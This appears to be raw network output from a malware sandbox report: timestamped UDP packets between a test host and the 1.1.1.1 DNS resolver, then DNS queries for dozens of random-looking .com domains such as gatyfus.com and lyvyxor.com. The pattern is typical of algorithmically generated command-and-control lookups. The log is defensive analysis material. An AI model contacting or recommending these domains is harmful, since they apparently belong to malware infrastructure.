                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369178057 CEST5195853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369748116 CEST6514853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369957924 CEST5614053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370162964 CEST6147253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370496035 CEST5950253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370800018 CEST5520353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371210098 CEST5047053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371382952 CEST6275553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371784925 CEST6385553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.372275114 CEST6092353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.372477055 CEST5455253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.376822948 CEST53534651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380325079 CEST5140053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380562067 CEST6130053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380748987 CEST6401753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.383908033 CEST5898153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384160995 CEST4919353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384596109 CEST5543553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384754896 CEST5175753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.385205984 CEST5001953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.392108917 CEST5842053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.392283916 CEST5243153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.395801067 CEST6243153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396183968 CEST5826153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396503925 CEST6061153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396709919 CEST4981453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396785021 CEST5352553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396939039 CEST6181753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397111893 CEST5747253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397212029 CEST6013053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397265911 CEST5101353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397413969 CEST5880953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397499084 CEST5105953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397638083 CEST6195253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397809029 CEST5200953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.398241997 CEST6177953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.398794889 CEST5233953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.400311947 CEST5999953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.402174950 CEST5120853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.404745102 CEST5122153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.406524897 CEST5735453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.409149885 CEST53651481.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.410144091 CEST53614721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.410155058 CEST53561401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.413777113 CEST53504701.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.416546106 CEST53594501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.416557074 CEST53627551.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.419575930 CEST53545521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.426805019 CEST53640171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.430423021 CEST53517571.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.430435896 CEST53638551.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.436914921 CEST53519581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.436924934 CEST53595021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.437220097 CEST53524311.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.440869093 CEST53552031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.440880060 CEST53584201.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.440893888 CEST53613631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.440902948 CEST53609231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.444044113 CEST53498141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.444055080 CEST53618171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.444063902 CEST53582611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449031115 CEST53606111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449042082 CEST53574721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449052095 CEST53514001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449060917 CEST53613001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449069977 CEST53510131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.449081898 CEST53491931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.452056885 CEST53554351.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.452066898 CEST53500191.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.452075958 CEST53512211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.452085972 CEST53619521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.456124067 CEST53589811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.456187963 CEST4946953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.464576006 CEST6236253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.464660883 CEST53601301.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.470576048 CEST53510591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.530714989 CEST53535251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.536432028 CEST53494691.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.544258118 CEST53616251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.545851946 CEST4948653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.557746887 CEST5236353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.595495939 CEST53588091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.618653059 CEST53624311.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.631315947 CEST53520091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.634027958 CEST6336253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.641598940 CEST53573541.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.691643953 CEST53512081.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.756923914 CEST53494861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.770108938 CEST53617791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.802073002 CEST53523391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.883096933 CEST53633621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.113429070 CEST53623621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.324592113 CEST5630153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.339766979 CEST53523631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.369992018 CEST53563011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.388036966 CEST5999953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.602802038 CEST53599991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.605423927 CEST53599991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.292578936 CEST5971153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293339014 CEST5666153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293385029 CEST6155353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293971062 CEST5603653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293971062 CEST6028153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.294676065 CEST5056953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.295011044 CEST6421553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.295671940 CEST6512153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.296260118 CEST6111053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.296848059 CEST6478053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.297442913 CEST6187453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.298099995 CEST6069353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.298651934 CEST5245853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.299210072 CEST4985653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.299808025 CEST6004953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.300384998 CEST6287153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.300954103 CEST5172653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.301500082 CEST5831553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.302083015 CEST6224153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.302737951 CEST5715953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303232908 CEST6170553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303584099 CEST6331353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303690910 CEST5271153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304171085 CEST5845453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304389000 CEST5139553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304903984 CEST5444053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.305392027 CEST5546753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.305891991 CEST6100453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.306343079 CEST6488753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.306777954 CEST5974753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.307290077 CEST6289653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.307761908 CEST5373453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.308258057 CEST6527153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.308737040 CEST6200253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.309158087 CEST6094153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.309710979 CEST6128453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.310223103 CEST5238653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.310722113 CEST5713353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.311157942 CEST5622953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.311661959 CEST6333153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.312134027 CEST6093453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.312629938 CEST5304953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313049078 CEST6011253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313491106 CEST6273353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313987970 CEST5361653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.314469099 CEST6143953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.314973116 CEST53566611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315025091 CEST5365253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315846920 CEST5648153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315887928 CEST5361853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316608906 CEST5098853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316838980 CEST5870453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316840887 CEST53615531.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316864967 CEST53602811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317074060 CEST5791053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317723036 CEST6224353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317944050 CEST53505691.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317955017 CEST53642151.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.318325043 CEST6091753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.319879055 CEST5570253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320058107 CEST5278853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320266962 CEST6550353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320403099 CEST5266353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320579052 CEST5464953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320715904 CEST4952753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320858955 CEST6216953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321003914 CEST6390453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321187973 CEST5006053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321337938 CEST5015353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327116966 CEST53498561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327192068 CEST53544401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327202082 CEST53647801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327322006 CEST53617051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.327332020 CEST53554671.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329741001 CEST53648871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329751015 CEST53610041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329758883 CEST53537341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.329767942 CEST53620021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.330019951 CEST53609411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331509113 CEST53523861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331518888 CEST53601121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.331526995 CEST53633311.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.332973003 CEST53560361.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.332988977 CEST53627331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334167957 CEST53609171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334178925 CEST53564811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334757090 CEST53579101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.334768057 CEST53509881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335485935 CEST53587041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335498095 CEST53622431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335746050 CEST53546491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.335937977 CEST53527881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.336170912 CEST53526631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.336287975 CEST53621691.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.337342978 CEST53639041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.344126940 CEST53652711.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346472025 CEST53622411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346601009 CEST53628961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.346914053 CEST53618741.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347012997 CEST53584541.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347023010 CEST53513951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347158909 CEST53600491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347167969 CEST53583151.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347176075 CEST53628711.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.347487926 CEST53597471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355380058 CEST53609341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355482101 CEST53527111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.355493069 CEST53606931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358375072 CEST53571591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358383894 CEST53530491.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358392954 CEST53562291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358401060 CEST53614391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358409882 CEST53536161.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358418941 CEST53536521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358428001 CEST53655031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358515978 CEST53500601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358525038 CEST53501531.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.358531952 CEST53536181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.360537052 CEST53557021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.362685919 CEST5303753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.363696098 CEST53495271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.375580072 CEST53530371.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.464183092 CEST53612841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.473449945 CEST53633131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.473612070 CEST53517261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.476619959 CEST53651211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.478456020 CEST53611101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.482508898 CEST5308753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.482800007 CEST53571331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.485553026 CEST53597111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.499622107 CEST6130553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.520848989 CEST53613051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.585969925 CEST53530871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.714740038 CEST53524581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.904136896 CEST6031553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:49:05.473535061 CEST53603151.1.1.1192.168.2.4
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Aug 23, 2024 18:46:59.878585100 CEST192.168.2.41.1.1.10x2a8Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.194921970 CEST192.168.2.41.1.1.10x8a6Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.233679056 CEST192.168.2.41.1.1.10x6eb6Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.245896101 CEST192.168.2.41.1.1.10x8281Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.246351004 CEST192.168.2.41.1.1.10x226fStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.247881889 CEST192.168.2.41.1.1.10x45daStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.400531054 CEST192.168.2.41.1.1.10x136aStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.401423931 CEST192.168.2.41.1.1.10x657cStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.425571918 CEST192.168.2.41.1.1.10x4114Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.452471972 CEST192.168.2.41.1.1.10x3911Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.569793940 CEST192.168.2.41.1.1.10xa038Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.569981098 CEST192.168.2.41.1.1.10x57b2Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.570346117 CEST192.168.2.41.1.1.10xf577Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.570496082 CEST192.168.2.41.1.1.10x1bf2Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.570624113 CEST192.168.2.41.1.1.10xac6Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.570748091 CEST192.168.2.41.1.1.10x7e89Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.570887089 CEST192.168.2.41.1.1.10x797Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.571018934 CEST192.168.2.41.1.1.10x9b7cStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.571315050 CEST192.168.2.41.1.1.10x6671Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.571496964 CEST192.168.2.41.1.1.10x1feeStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.571657896 CEST192.168.2.41.1.1.10xefc6Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.571813107 CEST192.168.2.41.1.1.10xb36eStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572108984 CEST192.168.2.41.1.1.10x6be9Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572258949 CEST192.168.2.41.1.1.10xb8a7Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572395086 CEST192.168.2.41.1.1.10x234dStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572529078 CEST192.168.2.41.1.1.10x232aStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572696924 CEST192.168.2.41.1.1.10x4810Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572839022 CEST192.168.2.41.1.1.10xc262Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.572989941 CEST192.168.2.41.1.1.10x5c9aStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.573390007 CEST192.168.2.41.1.1.10x90deStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
